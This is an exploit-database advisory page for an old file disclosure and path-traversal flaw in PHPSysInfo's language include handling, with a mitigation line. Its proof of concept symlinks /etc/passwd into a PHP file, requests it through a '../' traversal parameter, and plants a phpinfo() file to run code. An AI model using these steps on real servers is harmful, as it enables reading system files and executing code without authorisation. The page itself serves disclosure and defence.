header-logo
Suggest Exploit
vendor:
PHPSysInfo
by:
SecurityFocus
7.5
CVSS
HIGH
File Disclosure
200
CWE
Product Name: PHPSysInfo
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

PHPSysInfo File Disclosure Vulnerability

Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious language file is symlinked to a web server readable file, the contents of the linked file may be disclosed to the attacker. The file may also contain PHP code which may be executed in the context of the web server hosting the vulnerable application.

Mitigation:

Ensure that the include path for PHPSysinfo language include files is not influenced by malicious users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7286/info

PHPSysInfo has been reported to be vulnerable to a file disclosure issue.

Local users may be capable of influencing the include path for PHPSysinfo language include files. If the malicious language file is symlinked to a web server readable file, the contents of the linked file may be disclosed to the attacker. The file may also contain PHP code which may be executed in the context of the web server hosting the vulnerable application.

This attack may lead to confidential or sensitive information disclosure, which could be used to launch other attacks.

~$ ln -s /etc/passwd /tmp/p.php
http://www.example.com/index.php?lng=../../../../tmp/p


~$ echo "<?php phpinfo() ?>" > /tmp/p.php
http://www.example.com/index.php?lng=../../../../tmp/p